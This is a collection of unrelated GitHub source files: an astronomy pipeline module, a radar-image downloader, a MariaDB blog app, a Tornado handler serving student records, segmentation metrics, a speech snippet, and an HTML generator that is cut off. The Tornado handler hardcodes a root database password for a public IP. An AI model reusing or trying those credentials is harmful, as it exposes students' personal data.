database\n    if database is None:\n        calibdbm = drs_database.CalibrationDatabase(params)\n        calibdbm.load_db()\n    else:\n        calibdbm = database\n    # ------------------------------------------------------------------------\n    # load calib file\n    ckwargs = dict(key=key, inheader=header, filename=filename, fiber=fiber,\n                   userinputkey='LEAKFILE', database=calibdbm)\n\n    cfile = gen_calib.CalibFile()\n    cfile.load_calib_file(params, **ckwargs)\n    # get properties from calibration file\n    leak = cfile.data\n    leak_file = cfile.filename\n    leak_time = cfile.mjdmid\n    # ------------------------------------------------------------------------\n    # log which fpref file we are using\n    WLOG(params, '', textentry('40-016-00028', args=[leak_file]))\n    # return the reference image\n    return leak_file, leak, leak_time\n\n\ndef ref_dark_fp_cube(params: ParamDict, recipe: DrsRecipe,\n                     extractdict: Dict[str, List[DrsFitsFile]]\n                     ) -> Tuple[Dict[str, DrsFitsFile], Dict[str, Table]]:\n    \"\"\"\n\n    :param params: ParamDict, parameter dictionary of constants\n    :param recipe: DrsRecipe, the recipe class that called this function\n    :param extractdict: dictionary of lists of drs fits files - each list\n                        should have the fiber's extraction DrsFitsFile files\n                        each key should be a fiber\n    :return: tuple, 1. dictionary of the dark fp cube for each fiber (key),\n             2. 
the combine table for each dark fp cube for each fiber (key)\n    \"\"\"\n    # median cube storage dictionary\n    medcubedict = dict()\n    medcubetable = dict()\n    # loop around fibers\n    for fiber in extractdict:\n        # add level to recipe log\n        log2 = recipe.log.add_level(params, 'fiber', fiber)\n        # get the file list for this fiber\n        extfiles = extractdict[fiber]\n        # construct the combined file\n        extout = extfiles[0].combine(extfiles[1:], 'median',\n                                     test_similarity=False)\n        # get outfile and table\n        extfile, outtable = extout\n        # construct the leak reference file instance\n        outfile = recipe.outputs['LEAK_REF'].newcopy(params=params,\n                                                     fiber=fiber)\n        # construct the filename from file instance\n        outfile.construct_filename(infile=extfile)\n        # copy keys from input file\n        outfile.copy_original_keys(extfile)\n        # add median cube to outfile instance\n        outfile.data = extfile.data\n        # add to median cube storage\n        medcubedict[fiber] = outfile\n        medcubetable[fiber] = outtable\n        # end this log level\n        log2.end()\n    # return median cube storage dictionary\n    return medcubedict, medcubetable\n\n\ndef save_uncorrected_ext_fp(params: ParamDict, recipe: DrsRecipe,\n                            infile: DrsFitsFile, eprops: ParamDict,\n                            fiber: str, debug_uncorr: Optional[bool] = None):\n    \"\"\"\n    Save un-corrected extracted file (before correction) for debugging\n\n    :param params: ParamDict, parameter dictionary of constants\n    :param recipe: DrsRecipe, the recipe instance that called this function\n    :param infile: DrsFitsFile, the input file instance\n    :param eprops: ParamDict, parameter dictionary for extraction\n    :param fiber: str, the fiber\n    :param debug_uncorr: bool or None, if set to False does not save debug\n                         file, if set overrides 'DEBUG_UNCORR_EXT_FILES' from\n                         params\n\n    :return: None, saves debug file to disk\n    \"\"\"\n    # set function name\n    func_name = display_func('save_uncorrected_ext_fp', __NAME__)\n    # ------------------------------------------------------------------------\n    # get parameters from params\n    debug_uncorr_ext_files = pcheck(params, 'DEBUG_UNCORR_EXT_FILES',\n                                    func=func_name, override=debug_uncorr)\n    # -------------------------------------------------------------------------\n    # check we want to save uncorrected\n    if not debug_uncorr_ext_files:\n        return\n    # check that we have corrected leak\n    if not eprops['LEAK_CORRECTED']:\n        return\n    # get a new copy of the e2ds file\n    e2dsfile = recipe.outputs['E2DS_FILE'].newcopy(params=params,\n                                                   fiber=fiber)\n    # construct the filename from file instance\n    e2dsfile.construct_filename(infile=infile)\n    # define header keys for output file\n    # copy keys from input file (excluding loc)\n    e2dsfile.copy_original_keys(infile, exclude_groups=['loc'])\n    # add version\n    e2dsfile.add_hkey('KW_VERSION', value=params['DRS_VERSION'])\n    # add dates\n    e2dsfile.add_hkey('KW_DRS_DATE', value=params['DRS_DATE'])\n    e2dsfile.add_hkey('KW_DRS_DATE_NOW', value=params['DATE_NOW'])\n    # add process id\n    e2dsfile.add_hkey('KW_PID', value=params['PID'])\n    # add output tag\n    e2dsfile.add_hkey('KW_OUTPUT', value=e2dsfile.name)\n    e2dsfile.add_hkey('KW_FIBER', value=fiber)\n    # copy data\n    e2dsfile.data = eprops['LEAKCORR']\n    # -----------------------------------------------------------------\n    # get basename\n    infile = e2dsfile.basename\n    inpath = e2dsfile.filename\n    indir = inpath.split(infile)[0]\n    # add prefix\n    outfile = 'DEBUG-uncorr-{0}'.format(infile)\n    # construct full path\n    outpath = os.path.join(indir, outfile)\n    # set filename\n    e2dsfile.set_filename(outpath)\n    # log that we are saving e2ds uncorrected 
debug file\n    wargs = [e2dsfile.filename]\n    WLOG(params, '', textentry('40-016-00005', args=wargs))\n    # define multi lists\n    data_list, name_list = [], []\n    # snapshot of parameters\n    if params['PARAMETER_SNAPSHOT']:\n        data_list += [params.snapshot_table(recipe, drsfitsfile=e2dsfile)]\n        name_list += ['PARAM_TABLE']\n    # write image to file\n    e2dsfile.write_multi(data_list=data_list, name_list=name_list,\n                         block_kind=recipe.out_block_str,\n                         runstring=recipe.runstring)\n    # add to output files (for indexing)\n    recipe.add_output_file(e2dsfile)\n\n\ndef ref_fplines(params: ParamDict, recipe: DrsRecipe, e2dsfile: DrsFitsFile,\n                wavemap: np.ndarray, fiber: str,\n                database: Optional[CalibrationDatabase] = None,\n                fptypes: Optional[List[str]] = None) -> Union[Table, None]:\n    \"\"\"\n    Construct the reference FP line table\n\n    :param params: ParamDict, parameter dictionary of constants\n    :param recipe: DrsRecipe, the recipe instance that called this function\n    :param e2dsfile: DrsFitsFile, the extracted file instance\n    :param wavemap: numpy 2D array, the wave map to use\n    :param fiber: str, the fiber we are using\n    :param database: Calibration database or None, if not set reloads the\n                     calibration database\n    :param fptypes: list of strings or None, the allowed FP DPRTYPES, if set\n                    overrides the params constant WAVE_FP_DPRLIST\n\n    :return: either None or the FP line table\n    \"\"\"\n    # set up function name\n    func_name = display_func('ref_fplines', __NAME__)\n    # get constant from params\n    allowtypes = pcheck(params, 'WAVE_FP_DPRLIST', func=func_name,\n                        override=fptypes, mapf='list')\n    # get dprtype\n    dprtype = e2dsfile.get_hkey('KW_DPRTYPE', dtype=str)\n    # get pseudo constants\n    pconst = constants.pload()\n    sfibers, rfiber = pconst.FIBER_KINDS()\n    # ----------------------------------------------------------------------\n    # deal with fiber being the reference fiber\n    if fiber != rfiber:\n        # Skipping FPLINES (Fiber = {0})\n        WLOG(params, 'debug', textentry('90-016-00003', args=[fiber]))\n        return None\n    # ----------------------------------------------------------------------\n    # deal with allowed dprtypes\n    if dprtype not in allowtypes:\n        # Skipping FPLINES (DPRTYPE = {0})\n        WLOG(params, 'debug', textentry('90-016-000034', args=[dprtype]))\n        return None\n    # ----------------------------------------------------------------------\n    # get reference hc lines and fp lines from calibDB\n    wout = wave.get_wavelines(params, fiber, infile=e2dsfile,\n                              database=database)\n    mhclines, mhclsource, mfplines, mfplsource = wout\n    # deal with no fplines found\n    if mfplines is None:\n        return None\n    # ----------------------------------------------------------------------\n    # generate the fp reference lines\n    fpargs = dict(e2dsfile=e2dsfile, wavemap=wavemap, fplines=mfplines)\n    rfpl = wave.calc_wave_lines(params, recipe, **fpargs)\n    # ----------------------------------------------------------------------\n    # return fp lines for e2ds file\n    return rfpl\n\n\ndef qc_leak_ref(params: ParamDict, medcubes: Dict[str, DrsFitsFile]\n                ) -> Tuple[Dict[str, List[list]], bool]:\n    \"\"\"\n    Perform the quality control for the leak reference recipe\n\n    :param params: ParamDict, parameter dictionary of constants\n    :param medcubes: dictionary of drs fits file per fiber (key=fiber)\n\n    :return: tuple, 1. the quality control dictionary one key for each fiber\n             each value is a list of quality control params, 2. 
whether\n quality control was passed\n \"\"\"\n # output storage\n qc_params = dict()\n passed = True\n # loop around fibers\n for fiber in medcubes:\n # log that we are doing qc for a specific fiber\n WLOG(params, 'info', textentry('40-016-00026', args=[fiber]))\n # set passed variable and fail message list\n fail_msg, qc_values, qc_names, qc_logic, qc_pass = [], [], [], [], []\n # no quality control currently\n qc_values.append('None')\n qc_names.append('None')\n qc_logic.append('None')\n qc_pass.append(1)\n # ------------------------------------------------------------------\n # finally log the failed messages and set QC = 1 if we pass the\n # quality control QC = 0 if we fail quality control\n if np.sum(qc_pass) == len(qc_pass):\n WLOG(params, 'info', textentry('40-005-10001'))\n passed_fiber = 1\n else:\n for farg in fail_msg:\n WLOG(params, 'warning', textentry('40-005-10002') + farg,\n sublevel=6)\n passed_fiber = 0\n # store in qc_params\n qc_params_fiber = [qc_names, qc_values, qc_logic, qc_pass]\n # append to storage\n qc_params[fiber] = qc_params_fiber\n passed &= passed_fiber\n # return qc_params and passed\n return qc_params, passed\n\n\ndef qc_leak(params: ParamDict, props: ParamDict, extname: Optional[str] = None\n ) -> Tuple[Dict[str, List[list]], bool]:\n \"\"\"\n Quality control for the leak correction\n\n :param params: ParamDict, the parameter dictionary of constants\n :param props: ParamDict, the leak ref parameter dictionary\n :param extname: str or None, the e2ds file name to use as the extract\n file for quality control\n\n :return: tuple, 1. the quality control dictionary one key for each fiber\n each value is a list of quality control params, 2. whether\n quality control was passed\n \"\"\"\n # set function name\n func_name = __NAME__ + '.qc_leak()'\n # get outputs from props\n outputs = props['OUTPUTS']\n # get leak extract file\n extname = pcheck(params, 'LEAK_EXTRACT_FILE', func=func_name,\n override=extname)\n # output storage\n qc_params = dict()\n passed = True\n # loop around fibers\n for fiber in outputs:\n # log that we are doing qc for a specific fiber\n WLOG(params, 'info', textentry('40-016-00026', args=[fiber]))\n # set passed variable and fail message list\n fail_msg = []\n # ------------------------------------------------------------------\n # deal with old qc params\n # ------------------------------------------------------------------\n # get extfile\n extfile = outputs[fiber][extname]\n # copy the quality control from header\n qc_names, qc_values, qc_logic, qc_pass = extfile.get_qckeys()\n # ------------------------------------------------------------------\n # finally log the failed messages and set QC = 1 if we pass the\n # quality control QC = 0 if we fail quality control\n if np.sum(qc_pass) == len(qc_pass):\n WLOG(params, 'info', textentry('40-005-10001'))\n passed_fiber = 1\n else:\n for farg in fail_msg:\n WLOG(params, 'warning', textentry('40-005-10002') + farg,\n sublevel=6)\n passed_fiber = 0\n # store in qc_params\n qc_params_fiber = [qc_names, qc_values, qc_logic, qc_pass]\n # append to storage\n qc_params[fiber] = qc_params_fiber\n passed &= passed_fiber\n # return qc_params and passed\n return qc_params, passed\n\n\ndef write_leak_ref(params: ParamDict, recipe: DrsRecipe, rawfiles: List[str],\n medcubes: Dict[str, DrsFitsFile],\n medtables: Dict[str, Table],\n qc_params: Dict[str, List[list]],\n props: ParamDict) -> Dict[str, DrsFitsFile]:\n \"\"\"\n Write the leak reference files to disk\n\n :param params: ParamDict, the parameter 
dictionary of constants\n    :param recipe: DrsRecipe, the recipe instance that called this function\n    :param rawfiles: list of strings, the input files for this recipe\n    :param medcubes: dictionary of DrsFitsFiles, one for each fiber\n    :param medtables: dictionary of tables, one for each fiber\n    :param qc_params: dictionary of quality control lists, one for each fiber\n    :param props: ParamDict, the leak reference parameter dictionary\n\n    :return: dictionary of DrsFitsFiles, the DrsFitsFile for each fiber\n             as written to disk\n    \"\"\"\n    # loop around fibers\n    for fiber in medcubes:\n        # get outfile for this fiber\n        outfile = medcubes[fiber]\n        # get qc_params for this fiber\n        qc_params_fiber = qc_params[fiber]\n        # ------------------------------------------------------------------\n        # have already copied original keys in ref_dark_fp_cube function\n        # data is already added as well\n        # so just need other keys\n        # ------------------------------------------------------------------\n        # add version\n        outfile.add_hkey('KW_VERSION', value=params['DRS_VERSION'])\n        # add dates\n        outfile.add_hkey('KW_DRS_DATE', value=params['DRS_DATE'])\n        outfile.add_hkey('KW_DRS_DATE_NOW', value=params['DATE_NOW'])\n        # add process id\n        outfile.add_hkey('KW_PID', value=params['PID'])\n        # add output tag\n        outfile.add_hkey('KW_OUTPUT', value=outfile.name)\n        # add input files\n        outfile.add_hkey_1d('KW_INFILE1', values=rawfiles, dim1name='file')\n        # add input files to outfile\n        outfile.infiles = list(rawfiles)\n        # add qc parameters\n        outfile.add_qckeys(qc_params_fiber)\n        # add leak parameters from props (if set)\n        if props is not None:\n            outfile.add_hkey('KW_LEAK_BP_U',\n                             value=props['LEAK_BCKGRD_PERCENTILE'])\n            outfile.add_hkey('KW_LEAK_NP_U',\n                             value=props['LEAK_NORM_PERCENTILE'])\n            outfile.add_hkey('KW_LEAK_WSMOOTH', value=props['LEAKREF_WSMOOTH'])\n            outfile.add_hkey('KW_LEAK_KERSIZE', value=props['LEAKREF_KERSIZE'])\n        # log that we are saving the leak reference file\n        wargs = [fiber, outfile.filename]\n        WLOG(params, '', textentry('40-016-00025', args=wargs))\n        # define multi lists\n        data_list = [medtables[fiber]]\n        datatype_list = ['table']\n        name_list = ['COMBINE_TABLE']\n        # snapshot of parameters\n        if params['PARAMETER_SNAPSHOT']:\n            data_list += [params.snapshot_table(recipe, drsfitsfile=outfile)]\n            datatype_list += ['table']\n            name_list += ['PARAM_TABLE']\n        # write image to file\n        outfile.write_multi(data_list=data_list, name_list=name_list,\n                            datatype_list=datatype_list,\n                            block_kind=recipe.out_block_str,\n                            runstring=recipe.runstring)\n        # add to output files (for indexing)\n        recipe.add_output_file(outfile)\n        # update med cubes (as it was shallow copied this is just for sanity\n        # check)\n        medcubes[fiber] = outfile\n    # return medcubes\n    return medcubes\n\n\ndef write_leak(params: ParamDict, recipe: DrsRecipe,\n               inputs: Dict[str, Dict[str, DrsFitsFile]],\n               props: ParamDict, qc_params: Dict[str, List[list]],\n               s1dextfile: Optional[str] = None):\n    \"\"\"\n    Write the leak file to disk\n\n    :param params: ParamDict, the parameter dictionary of constants\n    :param recipe: DrsRecipe, the recipe instance that called this function\n    :param inputs: dictionary key per fiber, the input extraction DrsFitsFiles\n                   each inner key is a type of extraction file\n    :param props: ParamDict, the leak parameter dictionary\n    :param qc_params: dictionary key per fiber, the quality control lists\n    :param s1dextfile: str or None, this is the s1d file instance name to use,\n                       if set overrides \"EXT_S1D_INFILE\" from params\n\n    :return: None, writes leak files 
to disk\n    \"\"\"\n    # set function name\n    func_name = __NAME__ + '.write_leak()'\n    # get outputs from props\n    outputs = props['OUTPUTS']\n    s1dw_outs = props['S1DW']\n    s1dv_outs = props['S1DV']\n    # set header keys to add\n    keys = ['KW_LEAK_BP_U', 'KW_LEAK_NP_U', 'KW_LEAK_LP_U', 'KW_LEAK_UP_U',\n            'KW_LEAK_BADR_U']\n    values = ['LEAK_BCKGRD_PERCENTILE_USED', 'LEAK_NORM_PERCENTILE_USED',\n              'LEAK_LOW_PERCENTILE_USED', 'LEAK_HIGH_PERCENTILE_USED',\n              'LEAK_BAD_RATIO_OFFSET_USED']\n\n    # ----------------------------------------------------------------------\n    # 2D files\n    # ----------------------------------------------------------------------\n    # loop around fibers\n    for fiber in outputs:\n        # loop around files\n        for extname in outputs[fiber]:\n            # get the extraction file for this output type\n            extfile = outputs[fiber][extname]\n            # add infiles to out file\n            extfile.infiles = [extfile.basename]\n            # add leak corr key\n            extfile.add_hkey('KW_LEAK_CORR', value=True)\n            # loop around leak keys to add\n            for it in range(len(keys)):\n                extfile.add_hkey(keys[it], value=props[values[it]])\n            # add qc parameters\n            extfile.add_qckeys(qc_params[fiber])\n            # log that we are saving file\n            wargs = [fiber, extname, extfile.filename]\n            WLOG(params, '', textentry('40-016-00030', args=wargs))\n            # define multi lists\n            data_list, name_list = [], []\n            # snapshot of parameters\n            if params['PARAMETER_SNAPSHOT']:\n                data_list += [params.snapshot_table(recipe,\n                                                    drsfitsfile=extfile)]\n                name_list += ['PARAM_TABLE']\n            # write image to file\n            extfile.write_multi(data_list=data_list, name_list=name_list,\n                                block_kind=recipe.out_block_str,\n                                runstring=recipe.runstring)\n            # add back to outputs dictionary (used for s1d)\n            outputs[fiber][extname] = extfile\n            # add to output files (for indexing)\n            recipe.add_output_file(extfile)\n\n    # ----------------------------------------------------------------------\n    # S1D files\n    # ----------------------------------------------------------------------\n    # get the leak extract file type\n    s1dextfile = pcheck(params, 'EXT_S1D_INFILE',\n                        func=func_name, override=s1dextfile)\n    # loop around fibers\n    for fiber in outputs:\n        # get extfile\n        extfile = outputs[fiber][s1dextfile]\n        # get s1d props for this fiber\n        swprops = s1dw_outs[fiber]\n        svprops = s1dv_outs[fiber]\n        # get input extraction file (1D case)\n        s1dwfile = inputs[fiber]['S1D_W_FILE']\n        s1dvfile = inputs[fiber]['S1D_V_FILE']\n        # ------------------------------------------------------------------\n        # Store S1D_W in file\n        # ------------------------------------------------------------------\n        # copy header from e2dsff file\n        s1dwfile.copy_header(extfile)\n        # set output key\n        s1dwfile.add_hkey('KW_OUTPUT', value=s1dwfile.name)\n        # add new header keys\n        s1dwfile = gen_ext.add_s1d_keys(s1dwfile, swprops)\n        # copy in files\n        s1dwfile.infiles = list(extfile.infiles)\n        # copy data\n        s1dwfile.data = swprops['S1DTABLE']\n        # must change the datatype to 'table'\n        s1dwfile.datatype = 'table'\n        # ------------------------------------------------------------------\n        # log that we are saving the s1d wave file\n        wargs = [fiber, 'wave', s1dwfile.filename]\n        WLOG(params, '', textentry('40-016-00031', args=wargs))\n        # define multi lists\n        data_list, name_list = [], []\n        # snapshot of parameters\n        if params['PARAMETER_SNAPSHOT']:\n            data_list += [params.snapshot_table(recipe, drsfitsfile=s1dwfile)]\n            name_list += ['PARAM_TABLE']\n        # write image to file\n        s1dwfile.write_multi(data_list=data_list, name_list=name_list,\n                             block_kind=recipe.out_block_str,\n                             runstring=recipe.runstring)\n        # add to 
output files (for indexing)\n        recipe.add_output_file(s1dwfile)\n        # ------------------------------------------------------------------\n        # Store S1D_V in file\n        # ------------------------------------------------------------------\n        # copy header from e2dsff file\n        s1dvfile.copy_header(extfile)\n        # add new header keys\n        s1dvfile = gen_ext.add_s1d_keys(s1dvfile, svprops)\n        # copy in files\n        s1dvfile.infiles = list(extfile.infiles)\n        # set output key\n        s1dvfile.add_hkey('KW_OUTPUT', value=s1dvfile.name)\n        # copy data\n        s1dvfile.data = svprops['S1DTABLE']\n        # must change the datatype to 'table'\n        s1dvfile.datatype = 'table'\n        # ------------------------------------------------------------------\n        # log that we are saving the s1d velocity file\n        wargs = [fiber, 'velocity', s1dvfile.filename]\n        WLOG(params, '', textentry('40-016-00031', args=wargs))\n        # define multi lists\n        data_list, name_list = [], []\n        # snapshot of parameters\n        if params['PARAMETER_SNAPSHOT']:\n            data_list += [params.snapshot_table(recipe, drsfitsfile=s1dvfile)]\n            name_list += ['PARAM_TABLE']\n        # write image to file\n        s1dvfile.write_multi(data_list=data_list, name_list=name_list,\n                             block_kind=recipe.out_block_str,\n                             runstring=recipe.runstring)\n        # add to output files (for indexing)\n        recipe.add_output_file(s1dvfile)\n        # ------------------------------------------------------------------\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\nif __name__ == \"__main__\":\n    # print hello world\n    print('Hello World')\n\n# =============================================================================\n# End of code\n# =============================================================================\n","repo_name":"njcuk9999/apero-drs","sub_path":"apero/science/calib/leak.py","file_name":"leak.py","file_ext":"py","file_size_in_byte":48741,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"5"} +{"seq_id":"28585261999","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nimport shutil\nfrom datetime import datetime, timedelta\nimport os\nimport pytz\n\nos.chdir('/home/boto/newsnowmap')\n\nutc_now = pytz.utc.localize(datetime.utcnow())\ncet_now = utc_now.astimezone(pytz.timezone(\"Europe/Prague\"))\n\ntry:\n    with open('./data/downloaded', 'r') as f:\n        for line in f:\n            pass\n    last = line.strip()\nexcept FileNotFoundError:\n    last = datetime.strftime(utc_now - timedelta(days=3), '%Y%m%d.%H00')\n\nlast_img_dt = pytz.timezone(\"UTC\").localize(datetime.strptime(last, '%Y%m%d.%H%M'))\ncurrent_dt = utc_now\n\nwhile current_dt > last_img_dt:\n    new_img_dt = last_img_dt + timedelta(hours=1)\n    new_dt = datetime.strftime(new_img_dt, '%Y%m%d.%H%M')\n    img = requests.get('http://www.shmu.sk/data/dataradary/data.1hrain/pcp.1h.'+new_dt+'.0.png', stream=True)\n    if img.status_code != 200:\n        last_img_dt = new_img_dt\n        continue\n    else:\n        img.raw.decode_content = True\n        with open('./images/pcp.1h.'+new_dt+'.0.png','wb') as f:\n            shutil.copyfileobj(img.raw, f)\n        with open('./data/downloaded', 'a') as f:\n            f.write(new_dt+'\\n')\n        last_img_dt = new_img_dt\n\nprint('Download done!', datetime.utcnow(), 'UTC')\n","repo_name":"bboto32/newsnowmap","sub_path":"src/download_snowfall_images.py","file_name":"download_snowfall_images.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"36980423726","text":"import dbcreds\nimport mariadb\ndef select_all_posts(conn):\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM w20.blog_post\")\n allPost = cursor.fetchall()\n print(allPost)\n cursor.close()\n\ndef update_info(username,content):\n content = input(\"please give us some content about you: \")\n cursor = conn.cursor()\n cursor.execute(\"INSERT INTO w20.blog_post(username, content, id) VALUES(?,?, NULL)\",[username,content])\n conn.commit()\n cursor.close()\n\nconn = mariadb.connect(user=dbcreds.user,password=dbcreds.password,host=dbcreds.host,database=dbcreds.database,port=dbcreds.port)\n\nusername = input(\"what is your username?: \")\noption = input(\"What option would you like to select? (1: INSERT or 2: SEE ALL) \")\n\nif option == '1':\n update_info(username,option)\n \nelif option == '2':\n select_all_posts(conn)\n \nconn.close()","repo_name":"jaypn/w20a","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25025517657","text":"# -*- coding = utf-8 -*-\n# @File Name : lsa_metrics\n# @Date : 1/9/23 11:49 AM\n# @Author : zhiweideng\n# @E-mail : zhiweide@usc.edu\n\n\nimport sys\nimport time\nimport argparse\nimport subprocess\nimport numpy as np\nfrom tqdm import tqdm\nimport SimpleITK as sitk\nfrom sklearn import metrics\nimport seg_metrics.seg_metrics as sg\nsys.path.append('/ifs/loni/faculty/shi/spectrum/zdeng/MSA_Data/UnsupervisedVesselSeg/codes')\nfrom datasets.datasets_3d import get_data_loader_3d\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--method', type=str, default='ours')\nparser.add_argument('--split', type=str, default='test')\n\n\ndef dice_score(v_threshed, gt):\n if v_threshed.size == 0:\n return np.nan\n num = (2 * v_threshed * gt).mean()\n den = v_threshed.mean() + gt.mean() + 1e-100\n return num / den\n\n\ndef get_best_dice_threshold(response, label, thresholds):\n best_thresh, best_dice = None, -1\n n = int(len(thresholds) / 100.0)\n for thresh in (thresholds[::n]):\n bin_response = (response >= thresh) + 0.0\n curr_dice = dice_score(bin_response, label)\n if curr_dice > best_dice:\n best_thresh = thresh\n best_dice = curr_dice\n print(\"Got best dice {:.4f} at threshold {}\".format(best_dice, best_thresh))\n return best_thresh\n\n\ndef get_metrics(arguments):\n dice_scores, hd95_scores, avd_scores, best_thresholds = [], [], [], []\n data_loader = get_data_loader_3d(data_name='LSA', split=arguments.split, batch_size=1, shuffle=False)\n label_files = data_loader.dataset.label_files\n\n # compute the best thresholds\n for label_file in tqdm(label_files):\n subject_id = label_file.split('/')[-2]\n response_file = 'LSA_{}_{}/LSA_{}.nii.gz'.format(arguments.method, arguments.split, subject_id)\n print(response_file)\n response_image, label_image = sitk.ReadImage(response_file), sitk.ReadImage(label_file)\n response, label = sitk.GetArrayFromImage(response_image), sitk.GetArrayFromImage(label_image)\n _, _, thresholds = metrics.roc_curve(label.reshape(-1), response.reshape(-1), pos_label=1)\n curr_best_thresh = get_best_dice_threshold(response, label, thresholds)\n best_thresholds.append(curr_best_thresh)\n\n final_threshold = np.mean(best_thresholds)\n print('Final Threshold is {}.'.format(final_threshold))\n\n # compute the dice scores\n for label_file in tqdm(label_files):\n subject_id = label_file.split('/')[-2]\n response_file = 'LSA_{}_{}/LSA_{}.nii.gz'.format(arguments.method, 
arguments.split, subject_id)\n        binary_file = 'LSA_{}_{}/BIN_LSA_{}.nii.gz'.format(arguments.method, arguments.split, subject_id)\n        response_image, label_image = sitk.ReadImage(response_file), sitk.ReadImage(label_file)\n        response, label = sitk.GetArrayFromImage(response_image), sitk.GetArrayFromImage(label_image)\n        bin_response = (response >= final_threshold) + 0.0\n        # write the binary results\n        bin_image = sitk.GetImageFromArray(bin_response)\n        bin_image.CopyInformation(response_image)\n        sitk.WriteImage(bin_image, binary_file)\n        # get metrics\n        labels = [0, 1]\n        metric_results = sg.write_metrics(labels=labels[1:],\n                                          gdth_path=label_file,\n                                          pred_path=binary_file,\n                                          metrics=['dice', 'hd95'],\n                                          verbose=False)\n        curr_dice = metric_results[0]['dice'][0]\n        curr_hd95 = metric_results[0]['hd95'][0]\n        dice_scores.append(curr_dice)\n        hd95_scores.append(curr_hd95)\n        # get AVD metric\n        result1 = subprocess.run(['./EvaluateSegmentation', label_file, binary_file], capture_output=True, text=True)\n        curr_avd = float(result1.stdout[result1.stdout.find('AVGDIS')+9:result1.stdout.find('AVGDIS')+19])\n        avd_scores.append(curr_avd)\n\n    print(\"Method: {}\".format(arguments.method))\n    print(\"Dice Mean: {:.5f}, Std: {:.5f}\".format(np.mean(dice_scores), np.std(dice_scores)))\n    print(\"HD95 Mean: {:.5f}, Std: {:.5f}\".format(np.mean(hd95_scores), np.std(hd95_scores)))\n    print(\"AVD Mean: {:.5f}, Std: {:.5f}\".format(np.mean(avd_scores), np.std(avd_scores)))\n\n\nif __name__ == '__main__':\n    args = parser.parse_args()\n    get_metrics(args)\n","repo_name":"dengchihwei/LCNetVesselSeg","sub_path":"tests/LSA/lsa_metrics.py","file_name":"lsa_metrics.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"38728278131","text":"import tornado.ioloop\nimport tornado.web\nimport tornado.httpserver\nimport tornado.httpclient\nimport SqlHandler\nimport json\nimport utils\n\n\nclass AdmGetStudentListRequestHandler(tornado.web.RequestHandler):\n    def get(self):\n        \"\"\"\n        Fetch the student list from the database and return it to the admin\n        \"\"\"\n        try:\n            self.sqlhandler = None\n            if \"UID\" not in self.request.cookies.keys():\n                self.write(\"no uid\")\n                return\n\n            if not utils.isUIDValid(self):\n                self.write(\"no uid\")\n                return\n            if self.getStuList():\n                self.write(json.dumps(self.stuList if self.stuList is not None else {\"length\":0}))\n                self.finish()\n            else:\n                raise RuntimeError\n        except Exception as e:\n            print(e)\n            self.write(\"error\")\n            self.finish()\n        finally:\n            if self.sqlhandler is not None:\n                self.sqlhandler.closeMySql()\n\n    def getStuList(self):\n        \"\"\"\n        Read student information from the database\n        \"\"\"\n        self.sqlhandler = SqlHandler.SqlHandler(Host='139.159.176.78',\n                                                User='root',\n                                                Password='liyuhang8',\n                                                DBName='PersonDatabase')\n        if self.sqlhandler.getConnection():\n            \"\"\"\n            Query all students\n            \"\"\"\n\n            sql = \"select StuId, stuName, StuSex, StuAge, StuPhoneNumber, StuQQ, StuAddress, StuClass from StuPersonInfo\"\n\n            self.stuList = self.sqlhandler.executeQuerySQL(sql)\n\n            return True\n        return False\n\n\nif __name__ == \"__main__\":\n\n    app = tornado.web.Application(\n        handlers=[(r\"/\", AdmGetStudentListRequestHandler)])\n    http_server = tornado.httpserver.HTTPServer(app)\n    http_server.listen(8080)\n    tornado.ioloop.IOLoop.current().start()\n","repo_name":"lyh-ADT/edu-app","sub_path":"server/admin/python/AdmGetStudentListRequestHandler.py","file_name":"AdmGetStudentListRequestHandler.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"23936054396","text":"#Программа предназначена для выбора звуковых секций из речевой базы для дальнейшего синтеза\r\n#Автор: Сафина А.М.\r\n#На вход принимается список слов\r\n#Выход��ые данные: соответствующие списку звуковые дорожки\r\nimport pyttsx3\r\ndef sound_choose(my_string_1):\r\n print(\"\\nЧитаю... \")\r\n my_string_2 = my_string_1\r\n engine = pyttsx3.init()\r\n voices = engine.getProperty('voices')\r\n engine.setProperty('voice', voices[2].id)\r\n engine.say(my_string_2)\r\n engine.save_to_file(my_string_2, 'test_sound_choose_3.mp3')\r\n engine.runAndWait()\r\n return 0\r\n","repo_name":"puffsi/NIR","sub_path":"sound_choose.py","file_name":"sound_choose.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22387601533","text":"import os\nimport Objetos\n\ndef main():\n object1 = Objetos.Objetos(\"Dennis\",20,True,2000)\n object2 = Objetos.Objetos(\"Luis\",25,True,2300)\n object3 = Objetos.Objetos(\"Leslie\",23,True,2444)\n object4 = Objetos.Objetos(\"Juan\",20,False,2333)\n object5 = Objetos.Objetos(\"Renee\",20,True,5312)\n object6 = Objetos.Objetos(\"Jessica\",20,False,4455)\n object7 = Objetos.Objetos(\"Sarah\",19,True,12345)\n object8 = Objetos.Objetos(\"Carlos\",27,True,3333)\n object9 = Objetos.Objetos(\"Cesar\",19,False,4682)\n object10 = Objetos.Objetos(\"Francisco\",21,True,6532)\n\n listaobjetos = [object1,object2,object3,object4,object5,object6,object7,object8,object9,object10]\n rows = rowGenerator(listaobjetos)\n\n html_string = \"\"\" \n \n \n \n \n \n \n \n \n \n \"\"\"+rows+\"\"\" \n
NombreEdadActivoSaldo
